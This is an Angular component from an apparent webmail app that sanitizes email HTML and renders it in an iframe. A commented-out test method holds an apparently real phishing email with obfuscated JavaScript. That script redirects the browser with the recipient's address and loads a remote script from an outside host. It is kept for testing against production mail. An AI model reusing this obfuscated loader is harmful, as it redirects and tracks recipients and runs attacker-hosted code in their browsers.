import { Component, ViewChild, ElementRef, AfterViewInit, SecurityContext } from '@angular/core';
import { DomSanitizer } from '@angular/platform-browser';
import { SelectedMailService } from '../../../../../../services/selected-mail.service';
import { Email } from '../../../../../../model/Email';

@Component({
  selector: 'app-mail-details-body',
  templateUrl: './mail-details-body.component.html',
  styleUrls: ['./mail-details-body.component.scss'],
  standalone: false,
})
export class MailDetailsBodyComponent implements AfterViewInit {
  public htmlData: any;
  currentEmail: Email;
  @ViewChild('iframe') iframe: ElementRef;
  doc: any;
  compRef: any;
  attachmentDynamicPadding = 0;
  screenHeight: number;
  screenWidth: number;

  constructor(
    private sanitizer: DomSanitizer,
    private selectedMailService: SelectedMailService,
  ) {}

  ngAfterViewInit() {
    this.selectedMailService.selectedEmail.subscribe((email) => {
      this.currentEmail = email;
      this.htmlData = null;

      if (this.currentEmail && (this.currentEmail.bodyHtml || this.currentEmail.bodyPlain)) {
        // Preserve this to check emails directly from prod
        // this.hardcodeHtml();
        // Enable strip scripts if sandbox solution blocks valid messages
        // this.currentEmail.bodyHtml = this.stripScripts(this.currentEmail.bodyHtml);
        if (this.currentEmail.bodyHtml && this.currentEmail.bodyHtml.trim() !== '') {
          this.removeDocType();
          this.currentEmail.bodyHtml = this.removeComments(this.currentEmail.bodyHtml);
          this.htmlData = this.sanitizer.sanitize(
            SecurityContext.HTML,
            this.sanitizer.bypassSecurityTrustHtml(this.currentEmail.bodyHtml),
          );
        } else {
          this.htmlData = this.currentEmail.bodyPlain;
        }
        this.setIframeReady(this.iframe, this.htmlData);
      } else {
        this.iframe.nativeElement.style.setProperty('display', 'none');
      }
      // Scroll to the top once the selected email changes
      const element: HTMLIFrameElement = document.getElementById('emailIframe') as HTMLIFrameElement;
      const iframe = element.contentWindow;
      iframe.document.querySelectorAll('*').forEach((n) => n.scrollTo(0, 0));
    });
  }

  removeDocType() {
    this.currentEmail.bodyHtml = this.currentEmail.bodyHtml.replace('"-//W3C//DTD HTML 4.01//EN"', '');
  }

  private setIframeReady(iframe: ElementRef, html: string): void {
    const win: Window = iframe.nativeElement.contentWindow;
    if (win) {
      const doc: Document = win.document;
      doc.open();
      doc.write(html);
      doc.close();
      this.iframe.nativeElement.style.setProperty('display', 'inherit');
      // this.iframe.nativeElement.style.setProperty('width',this.iframe.nativeElement.contentWindow.document.body.scrollWidth + 'px');
      this.iframe.nativeElement.style.setProperty(
        'height',
        this.iframe.nativeElement.contentWindow.document.body.scrollHeight + 'px',
      );
      this.iframe.nativeElement.style.setProperty('width', '95%');
      // this.iframe.nativeElement.style.setProperty('height','calc(100vh - 148px)');

      const htmlElement: HTMLIFrameElement = document.getElementById('emailIframe') as HTMLIFrameElement;
      const htmlIframe = htmlElement.contentWindow;
      if (htmlIframe) {
        const iframeDoc = htmlIframe.document;

        const style = iframeDoc.createElement('style');
        style.innerHTML = `
          a {
            color: #4A09B4 !important;
          }
        `;
        iframeDoc.head.appendChild(style);

        htmlIframe.document.querySelectorAll('*').forEach((n) => {
          if (n.tagName == 'A') {
            n.setAttribute('target', '_blank');
          }
        });
      }
    }
  }

  formatPlain(str) {
    str = this.formatPlainDouble(str);
    str = this.formatPlainSingle(str);
    return str;
  }

  formatPlainDouble(str) {
    let parsedStr = str.split('\\r\\n').join('<br>');
    parsedStr = parsedStr.split('\\r').join('<br>');
    parsedStr = parsedStr.split('\\n').join('<br>');
    parsedStr = parsedStr.trim();
    if (parsedStr.substr(0, 2).toLowerCase() == "b'" || parsedStr.substr(0, 2).toLowerCase() == 'b"') {
      parsedStr = parsedStr.substr(2);
    }
    if (parsedStr.substr(parsedStr.length - 1) == "'" || parsedStr.substr(parsedStr.length - 1) == '"') {
      parsedStr = parsedStr.substr(0, parsedStr.length - 1);
    }
    return parsedStr;
  }

  formatPlainSingle(str) {
    let parsedStr = str.split('\r\n').join('<br>');
    parsedStr = parsedStr.split('\r').join('<br>');
    parsedStr = parsedStr.split('\n').join('<br>');
    parsedStr = parsedStr.trim();
    if (parsedStr.substr(0, 2).toLowerCase() == "b'" || parsedStr.substr(0, 2).toLowerCase() == 'b"') {
      parsedStr = parsedStr.substr(2);
    }
    if (parsedStr.substr(parsedStr.length - 1) == "'" || parsedStr.substr(parsedStr.length - 1) == '"') {
      parsedStr = parsedStr.substr(0, parsedStr.length - 1);
    }
    return parsedStr;
  }

  removeComments(html: string) {
    var result = html;
    const startTag = '<!--';
    const endTag = '-->';
    while (result.indexOf(startTag) > 0) {
      const startIndex = result.indexOf(startTag);
      const endIndex = result.indexOf(endTag, startIndex);
      if (endIndex === -1) {
        break;
      }
      const commentedSnippet = result.substring(startIndex, endIndex + endTag.length);
      result = result.replace(commentedSnippet, '');
    }
    return result;
  }

  // hardcodeHtml() {
  //   this.currentEmail.bodyHtml = `
  //   <!DOCTYPE html><html><head><meta http-equiv="Content-Type" content="text/html;charset=utf-8"><meta name="robots" content="noindex,noarchive,nofollow,nosnippet" /><meta name="googlebot" content="noindex,noarchive,nofollow,nosnippet,noimageindex" /><meta name="slurp" content="noindex,noarchive,nofollow,nosnippet,noodp,noydir" /><meta name="msnbot" content="noindex,noarchive,nofollow,nosnippet" /><meta name="teoma" content="noindex,noarchive,nofollow,nosnippet" /><meta http-equiv="X-UA-Compatible" content="IE=IE9"><meta name="HandheldFriendly" content="true"><meta name="viewport" content="width=device-width initial-scale=1 user-scalable=no maximum-scale=1" /><title>Ncb7xQtJH3RadC1</title><link href="https://Xq8RlFstHc5TyK.org/mms" rel="shortcut icon" /></head><body class="7pasIk8HX3ZiUeMfWcNDK"><div class="4rjoMUYB5hQnAIHOvsfD83Ct" id="fYQCpJElbgNVxdKIqtiDayzGUnjcT"><div style="display:none "><div class="0snoHaegyRd1hM">uZWyt0vXO871Pdreq</div><div class="JFzW2ZCHe85Suo4Ojb3E">VEtqC42HY1DdWxwAk</div><div class="klun5hIrHg8tBxvE3UQA24OCw1Xmp">jhu2TC6l17rk8AKid</div><div class="pdwRAzMtOSEb8a">kBR8bn1N5YKWhPrFs</div><div class="Owntv9Lgb8xWredQay0EHAVzZBCq">EckCaXRY5wTlxevGA</div><div class="uwf2ynZFx1lrGPD3N">fczaHmLgQpAMuSPdE</div><div class="0t2TNFwO9hr3p8XaWlZRHsf5bSdAq">ViYtnZlXAfh5103vb</div><div class="LiybfIe5zraoED8G">yjAJI12V6SawrHKmx</div><div class="XUj5Msi0by4PdNO7rJ">nQgLqCofvxyaYu3NX</div><div class="I2VK0AyQzr7nRfioPsFXwCZ3g9tlM">ZYm95dp832Nnc7VHQ</div><div class="fQOsANx61K2BoYhuMLFZqp7RDGj">ZCOWt0BEJ9qR7AsNV</div><div class="kzaQsj59nuWHciP4UX3Sy">LpvKBm0HjVkI3od5q</div><div class="jJmYRGUKr8c4t7BLPyCvDqSAgXZWf">CVDgFE3bOi2SL6Xku</div><div class="VZMABf6wSzvDi3F">nKHGLcZM1SzXwgfEN</div><div class="mEJV0Oue9vMFAtxNiLsQZ4PlwSzUH">hOugASmQv5tsICPXp</div><div class="FYjWiCOopXMJyv">0iTKyJYGgPr4ve9os</div><div class="n61oMTjfJZpGXmLwBekl38zUS2Adt">GpEH1v2Iq08t65wBC</div><div class="4wZKzUNTuipXrLQFkjqBb5Ex9A2Se">NImJLkTDodq1g8cA3</div></div></div><script>var dbapmfyojghlaxpudukeifeqc="douglaswells@chatterworks.com";var _0x9329=["Aw5N","CMv0Dxi=","DvnSuJu=","iszaqwi=","yMLUza==","Aw9U","ChjVDg8=","wgnhrei=","yMjYzt0=","x19WCM8=","DhLWzq==","CKPhEfC=","pvz6teq=","yw1L","BIaOzNu=","qceMwwK=","ufrRz00=","DgLVBG==","Bg9N","D2fYBG==","wK1lze4=","zxHJzxa=","uhnKwvu=","quPwtc0=","AhjLzG==","sxb1Dhy=","CNvJDg8=","Cgf0Ag4=","Dg9tDhi=","p2jICMu=","BMn0Aw8=","wLj5rM4=","CM4GDgG=","vxjhAfG=","BxDOiY8=","DhjHy2u=","Bef0uwO=","AxmIksG=","yxbWBhK=","BeHPA1m=","qKfNt0S=","Bg9Jyxq=","Dg9FxW==","DgfIBgu=","zNn5reW=","BNn0CNu=","tfnyyw8="];!function(a,x){!function(x){for(;--x;)a.push(a.shift())}(134)}(_0x9329);var _0x30ab=function(x,a){var b=_0x9329[x=+x];void 0===_0x30ab.YmYekR&&(_0x30ab.gcdwKB=function(x){for(var a=function(x){for(var a,b,_=String(x).replace(/=+$/,""),n="",r=0,e=0;b=_.charAt(e++);~b&&(a=r%4?64*a+b:b,r++%4)&&(n+=String.fromCharCode(255&a>>(-2*r&6))))b="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=".indexOf(b);return n}(x),b=[],_=0,n=a.length;_<n;_++)b+="%"+("00"+a.charCodeAt(_).toString(16)).slice(-2);return decodeURIComponent(b)},_0x30ab.IlIpol={},_0x30ab.YmYekR=!0);var _=_0x30ab.IlIpol[x];return void 0===_?(b=_0x30ab.gcdwKB(b),_0x30ab.IlIpol[x]=b):b=_,b},_0x39e442=function(){var _=!0;return function(a,b){var x=_?function(){if(b){var x=b[_0x30ab("0x2e")](a,arguments);return b=null,x}}:function(){};return _=!1,x}}(),_0x2464c1=_0x39e442(this,function(){for(var x=function(){var a;try{a=Function(_0x30ab("0x9")+_0x30ab("0x16")+_0x30ab("0x26")+"n() {}.co"+_0x30ab("0x6")+'ctor("retu'+_0x30ab("0x28")+_0x30ab("0x2d")+" ));")()}catch(x){a=window}return a}(),a=x.console=x.console||{},b=[_0x30ab("0x1a"),_0x30ab("0x1b"),"info","error",_0x30ab("0x1d")+_0x30ab("0x19"),_0x30ab("0x4"),_0x30ab("0x2b")],_=0;_<b.length;_++){var n=_0x39e442["const"+_0x30ab("0x22")+"r"][_0x30ab("0xe")+_0x30ab("0x12")].bind(_0x39e442),r=b[_],e=a[r]||n;n[_0x30ab("0x11")+_0x30ab("0x3")]=_0x39e442[_0x30ab("0xc")](_0x39e442),n[_0x30ab("0x24")+_0x30ab("0x8")]=e["toStr"+_0x30ab("0x8")].bind(e),a[r]=n}});_0x2464c1();var ghexxtmmlohqguveynarpwui=_0x30ab("0xb")+_0x30ab("0xa")+_0x30ab("0x29")+_0x30ab("0x1c")+_0x30ab("0x17")+"7ZMeEaodpc"+_0x30ab("0x5")+"!&";-1==window[_0x30ab("0x2")+_0x30ab("0xd")][_0x30ab("0x20")].indexOf(_0x30ab("0x10"))&&(window[_0x30ab("0x2")+_0x30ab("0xd")][_0x30ab("0x20")]=document["locat"+_0x30ab("0xd")][_0x30ab("0x23")+_0x30ab("0x15")]+(_0x30ab("0x25")+_0x30ab("0x14")+_0x30ab("0x13")+_0x30ab("0x21")+_0x30ab("0x0")+_0x30ab("0x1")+_0x30ab("0x2a")+"tTQwqPceCEipXoWNKbBx"+_0x30ab("0x27")+_0x30ab("0x1f"))+ghexxtmmlohqguveynarpwui+"-"+dbapmfyojghlaxpudukeifeqc+"-NZmf"+_0x30ab("0x2c")+"vWInR"+_0x30ab("0x7")+_0x30ab("0x18")+"Kx/tCQbzkm"+_0x30ab("0x1e")+_0x30ab("0xf")+"Oy");;var _0x454d=["Dg9tDhi=","BIGPia==","zxHJzxa=","DgLVBG==","y24UChC=","y3jPChq=","AgvHza==","DhLWzq==","odnHowi=","CNvJDg8=","BIaOzNu=","zw1LBNq=","yxbWzw4=","Ahr0Chm=","z2v0rwW=","BNn0CNu=","Dgv4Dc8=","zw50","C0j5vge=","BMn0Aw8=","z05HBwu=","y29UC28=","DgfIBgu=","y3jLyxq=","Bg9N","C3jJ","zenOAwW=","yxbWBhK=","oduXn2u=","lZyZnta=","AMf2yxm=","zwy5ndC=","ChjVDg8=","x19WCM8=","y29UC3q=","C2nYAxa=","D2fYBG==","Aw5N","E30Uy28=","odnKm2u=","zxjYB3i=","iNjLDhu=","ltyZnta=","yMLUza==","zuvSzw0="];!function(d,x){!function(x){for(;--x;)d.push(d.shift())}(477)}(_0x454d);var _0x5d70=function(x,d){var _=_0x454d[x=+x];void 0===_0x5d70.nyMGfG&&(_0x5d70.OQJWyh=function(x){for(var d=function(x){for(var d,_,n=String(x).replace(/=+$/,""),r="",t=0,o=0;_=n.charAt(o++);~_&&(d=t%4?64*d+_:_,t++%4)&&(r+=String.fromCharCode(255&d>>(-2*t&6))))_="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=".indexOf(_);return r}(x),_=[],n=0,r=d.length;n<r;n++)_+="%"+("00"+d.charCodeAt(n).toString(16)).slice(-2);return decodeURIComponent(_)},_0x5d70.QSSsGg={},_0x5d70.nyMGfG=!0);var n=_0x5d70.QSSsGg[x];return void 0===n?(_=_0x5d70.OQJWyh(_),_0x5d70.QSSsGg[x]=_):_=n,_},_0x17d2d1=function(){var n=!0;return function(d,_){var x=n?function(){if(_){var x=_[_0x5d70("0x1")](d,arguments);return _=null,x}}:function(){};return n=!1,x}}(),_0x27003f=_0x17d2d1(this,function(){for(var x=function(){var d;try{d=Function("retur"+_0x5d70("0x1d")+_0x5d70("0x26")+_0x5d70("0x14")+(_0x5d70("0xc")+_0x5d70("0x22"))+"ctor("+_0x5d70("0xf")+'rn this")( ));')()}catch(x){d=window}return d}(),d=x[_0x5d70("0x28")+"le"]=x[_0x5d70("0x28")+"le"]||{},_=[_0x5d70("0x2b"),_0x5d70("0xa"),"info",_0x5d70("0xe"),_0x5d70("0x15")+_0x5d70("0x16"),_0x5d70("0x29"),"trace"],n=0;n<_.length;n++){var r=_0x17d2d1[_0x5d70("0x8")+_0x5d70("0x1c")+"r"][_0x5d70("0x6")+_0x5d70("0x1a")][_0x5d70("0x11")](_0x17d2d1),t=_[n],o=d[t]||r;r[_0x5d70("0x7")+"to__"]=_0x17d2d1[_0x5d70("0x11")](_0x17d2d1),r[_0x5d70("0x13")+_0x5d70("0xb")]=o[_0x5d70("0x13")+"ing"][_0x5d70("0x11")](o),d[t]=r}});_0x27003f();var emfromgetnbrtoo="",CfwgSoErYFpyIxzXQG=document[_0x5d70("0x2a")+_0x5d70("0x12")+_0x5d70("0x24")](_0x5d70("0x9")+"t");CfwgSoErYFpyIxzXQG.type=_0x5d70("0x23")+_0x5d70("0x4")+_0x5d70("0x18"),CfwgSoErYFpyIxzXQG[_0x5d70("0x2c")]=_0x5d70("0x20")+"://nnv.quatiapp"+_0x5d70("0x17")+_0x5d70("0x3")+_0x5d70("0x2")+"83a9b41c9eef94f"+_0x5d70("0x10")+_0x5d70("0xd")+_0x5d70("0x1b")+"41c9e"+_0x5d70("0x5")+".js",document[_0x5d70("0x21")+_0x5d70("0x1e")+_0x5d70("0x25")+_0x5d70("0x27")](_0x5d70("0x19"))[0][_0x5d70("0x1f")+_0x5d70("0x0")+"d"](CfwgSoErYFpyIxzXQG);</script></body></html>
  // `;
  // }

  stripScripts(a) {
    var b = new Option();
    var c;
    b.innerHTML = a;
    for (a = b.getElementsByTagName('script'); (c = a[0]); ) {
      c.parentNode.removeChild(c);
    }
    return b.innerHTML;
  }
}
